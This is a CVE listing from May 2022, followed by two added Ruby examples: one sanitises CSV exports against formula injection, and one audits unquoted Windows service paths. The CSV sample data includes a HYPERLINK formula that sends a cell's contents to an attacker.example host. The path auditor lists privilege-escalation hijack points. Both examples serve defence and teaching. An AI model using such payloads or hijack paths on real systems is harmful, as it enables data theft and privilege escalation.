CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2021-36784 | 1 Suse | 1 Rancher | 2022-05-09 | 6.5 MEDIUM | 7.2 HIGH | An Improper Privilege Management vulnerability in SUSE Rancher allows users with the restricted-admin role to escalate to full admin. This issue affects Rancher versions prior to 2.5.13 and versions prior to 2.6.4.
CVE-2022-1300 | 1 Trumpf | 3 Trutops Boost, Trutops Fab, Trutops Monitor | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL | Multiple versions of TRUMPF TruTops products expose a service function without the necessary authentication. Execution of this function may result in unauthorized modification of data or disruption of the whole service.
CVE-2020-23618 | 1 Xtendtech | 1 Voice Logger | 2022-05-09 | 4.3 MEDIUM | 6.1 MEDIUM | A reflected cross-site scripting (XSS) vulnerability in Xtend Voice Logger 1.0 allows attackers to execute arbitrary web scripts or HTML via the path of the error page.
CVE-2022-22783 | 1 Zoom | 2 Zoom On-premise Meeting Connector Controller, Zoom On-premise Meeting Connector Mmr | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH | A vulnerability in Zoom On-Premise Meeting Connector Controller version 4.8.102.20220310 and On-Premise Meeting Connector MMR version 4.8.102.20220310 exposes process memory fragments to connected clients, which could be observed by a passive attacker.
CVE-2022-28481 | 1 Csv-safe Project | 1 Csv-safe | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL | The CSV-Safe gem before 3.0.0 does not filter out special characters, which could trigger CSV injection.
CVE-2022-22782 | 1 Zoom | 4 Meetings, Rooms For Conference Rooms, Vdi Windows Meeting Clients and 1 more | 2022-05-09 | 6.6 MEDIUM | 7.1 HIGH | The Zoom Client for Meetings for Windows prior to version 5.9.7, Zoom Rooms for Conference Room for Windows prior to version 5.10.0, Zoom Plugins for Microsoft Outlook for Windows prior to version 5.10.3, and Zoom VDI Windows Meeting Clients prior to version 5.9.6 were susceptible to a local privilege escalation issue during the installer repair operation. A malicious actor could use this to delete system-level files or folders, causing integrity or availability issues on the user's host machine.
CVE-2022-24372 | 1 Linksys | 2 Mr9600, Mr9600 Firmware | 2022-05-09 | 4.9 MEDIUM | 4.6 MEDIUM | Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share.
CVE-2022-22781 | 1 Zoom | 1 Meetings | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH | The Zoom Client for Meetings for macOS (Standard and for IT Admin) prior to version 5.9.6 failed to properly check the package version during the update process. This could lead to a malicious actor downgrading an unsuspecting user's currently installed version to a less secure version.
CVE-2022-29585 | 1 Mahara | 1 Mahara | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH | In Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0, a site using Isolated Institutions is vulnerable if more than ten groups are used: from page 2 of the group results list onward, groups from all institutions are shown rather than only those of the institution the viewer is a member of.
CVE-2022-24887 | 1 Nextcloud | 1 Talk | 2022-05-09 | 5.8 MEDIUM | 6.1 MEDIUM | Nextcloud Talk is a video and audio conferencing app for Nextcloud, a self-hosted productivity platform. Prior to versions 11.3.4, 12.2.2, and 13.0.0, when sharing a Deck card in a conversation, the metaData can be manipulated so that users can be tricked into opening arbitrary URLs. This issue is fixed in versions 11.3.4, 12.2.2, and 13.0.0. There are currently no known workarounds.
CVE-2022-27905 | 1 Controlup | 1 Controlup | 2022-05-09 | 9.0 HIGH | 7.2 HIGH | In ControlUp Real-Time Agent before 8.6, an unquoted path can result in privilege escalation. An attacker would require write permissions to the root of the OS drive (C:\) to exploit this.
CVE-2022-23061 | 1 Shopizer | 1 Shopizer | 2022-05-09 | 5.5 MEDIUM | 6.5 MEDIUM | In Shopizer versions 2.0 to 2.17.0, a regular admin can permanently delete a superadmin (which the documentation states should not be possible) via an Insecure Direct Object Reference (IDOR) vulnerability.
CVE-2022-24935 | 1 Lexmark | 2 Lexmark, Lexmark Firmware | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH | Lexmark products through 2022-02-10 have Incorrect Access Control.
CVE-2022-28056 | 1 Shopxo | 1 Shopxo | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL | ShopXO v2.2.5 and below was discovered to contain a system re-install vulnerability via the Add function in app/install/controller/Index.php.
CVE-2022-23060 | 1 Shopizer | 1 Shopizer | 2022-05-09 | 3.5 LOW | 4.8 MEDIUM | A stored cross-site scripting (XSS) vulnerability exists in Shopizer versions 2.0 through 2.17.0, where a privileged user (attacker) can inject malicious JavaScript into the filename under the "Manage files" tab.
CVE-2022-0952 | 1 Sitemap Project | 1 Sitemap | 2022-05-09 | 6.8 MEDIUM | 8.8 HIGH | The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as users_can_register and default_role, allowing them to create a new admin account and take over the blog.
CVE-2022-29969 | 1 Mediawiki | 1 Rss For Mediawiki | 2022-05-09 | 4.3 MEDIUM | 6.1 MEDIUM | The RSS extension before 2022-04-29 for MediaWiki allows XSS via an rss element (if the feed is in $wgRSSUrlWhitelist and $wgRSSAllowLinkTag is true).
CVE-2022-27962 | 1 Bluecms Project | 1 Bluecms | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL | Bluecms 1.6 has a SQL injection vulnerability via a cookie value.
CVE-2022-20629 | 1 Cisco | 1 Firepower Management Center | 2022-05-09 | 3.5 LOW | 5.4 MEDIUM | Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
CVE-2022-20628 | 1 Cisco | 1 Firepower Management Center | 2022-05-09 | 3.5 LOW | 5.4 MEDIUM | Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
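The CVE-2022-28481 entry above (CSV-Safe gem before 3.0.0) is about CSV injection: a cell that begins with `=`, `+`, `-`, `@`, tab or carriage return is evaluated as a formula when the exported file is opened in a spreadsheet. The following is an added example, not code from the csv-safe gem or from the original page. It shows an unsanitised export beside one that neutralises formula triggers with a leading single quote (the widely used OWASP-style mitigation), while letting plain numeric strings such as `-7` through unchanged. The sample rows, the `attacker.example` URL and the function names are all constructed for this illustration.

```ruby
require "csv"

# First characters that make Excel, LibreOffice and Google Sheets treat a
# cell as a formula. Tab and carriage return are included because some
# importers use them to re-enter formula parsing mid-field.
FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# Neutralise one cell. Only String values can carry a payload; numbers
# pass through untouched. Leading spaces are ignored when looking for
# the trigger (conservative: some importers trim them before parsing),
# but plain numeric strings such as "-7" or "+3.5" are left alone so
# that negative amounts are not mangled in the export.
def sanitize_cell(value)
  return value unless value.is_a?(String)
  stripped = value.sub(/\A +/, "")
  return value if stripped.empty?
  return value if stripped.match?(/\A[-+]?\d+(\.\d+)?\z/)
  return value unless FORMULA_TRIGGERS.include?(stripped[0])
  "'#{value}"   # spreadsheets render a leading apostrophe as literal text
end

# Vulnerable export: attacker-controlled strings go to the file verbatim.
def unsafe_csv(rows)
  CSV.generate { |csv| rows.each { |row| csv << row } }
end

# Hardened export: every cell is passed through sanitize_cell first.
def safe_csv(rows)
  CSV.generate { |csv| rows.each { |row| csv << row.map { |cell| sanitize_cell(cell) } } }
end

# Constructed sample data: the first data row's "user" column is a
# display name an attacker chose so that it exfiltrates cell A1.
SAMPLE_ROWS = [
  ["user", "balance"],
  ["=HYPERLINK(\"http://attacker.example/?\"&A1,\"click\")", 12.5],
  ["alice", -3],
  ["@SUM(1+1)", "-7"],
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "--- unsafe ---", unsafe_csv(SAMPLE_ROWS)
  puts "--- safe ---", safe_csv(SAMPLE_ROWS)
end
```

Note that the CSV quoting applied by `CSV.generate` (the double quotes around the `=HYPERLINK(...)` field) does not protect the consumer: spreadsheet importers strip the field quotes and then evaluate the cell, which is why the mitigation has to change the cell's first character rather than rely on quoting.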
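The CVE-2022-27905 entry above (ControlUp Real-Time Agent before 8.6) describes an unquoted path that is exploitable by anyone who can write to the root of `C:\`. That constraint follows from how Windows resolves an unquoted service ImagePath containing spaces: `CreateProcess`, called without an explicit application name, tries each space-delimited prefix of the command line as the executable (appending `.exe` when the prefix has no extension) until one exists, so `C:\Program Files\...` is first tried as `C:\Program.exe`. The example below is added here and is not ControlUp's code or configuration; it models that resolution order so an auditor can list the hijack points for a given ImagePath and produce the quoted form that removes them. The ImagePath used is hypothetical, and the model assumes the real service binary ends in `.exe`.

```ruby
# Split an ImagePath into [executable, arguments] the way the Windows
# loader does for an unquoted path with spaces: the executable is the
# first space-delimited prefix that names a .exe (assumption: the
# service binary has a .exe extension). A quoted path is unambiguous.
def exe_and_args(image_path)
  if image_path.start_with?('"')
    close = image_path.index('"', 1)
    return [image_path[1..], ""] if close.nil?          # unterminated quote
    return [image_path[1...close], image_path[(close + 1)..].strip]
  end
  tokens = image_path.split(" ")
  tokens.each_index do |i|
    prefix = tokens[0..i].join(" ")
    return [prefix, tokens[(i + 1)..].join(" ")] if File.extname(prefix).casecmp?(".exe")
  end
  [image_path, ""]   # no .exe found; treat the whole string as the binary
end

# Every path Windows would try *before* reaching the real executable.
# Each is a hijack point if an attacker can create that file, i.e. can
# write to its parent directory. For "C:\Program Files\..." the first
# candidate lives directly under C:\, which is why write access to the
# drive root is enough to exploit the unquoted path.
def hijack_candidates(image_path)
  return [] if image_path.start_with?('"')
  exe, = exe_and_args(image_path)
  tokens = exe.split(" ")
  (1...tokens.size).map do |n|
    prefix = tokens[0, n].join(" ")
    File.extname(prefix).empty? ? "#{prefix}.exe" : prefix
  end
end

# The fix: quote the executable portion so the loader never splits it.
def quote_image_path(image_path)
  return image_path if image_path.start_with?('"')
  exe, args = exe_and_args(image_path)
  args.empty? ? %("#{exe}") : %("#{exe}" #{args})
end

# Hypothetical ImagePath, constructed for this example.
HYPOTHETICAL_IMAGE_PATH = 'C:\Program Files\Vendor Agent\agent.exe -svc'

if __FILE__ == $PROGRAM_NAME
  puts "Hijack candidates for #{HYPOTHETICAL_IMAGE_PATH}:"
  hijack_candidates(HYPOTHETICAL_IMAGE_PATH).each { |c| puts "  #{c}" }
  puts "Fixed ImagePath: #{quote_image_path(HYPOTHETICAL_IMAGE_PATH)}"
end
```

On a real host the same check is run against the `ImagePath` values under `HKLM\SYSTEM\CurrentControlSet\Services`; a candidate is only exploitable when the attacker can create files in its parent directory and the service runs with higher privileges than the attacker, which is the situation the CVE describes.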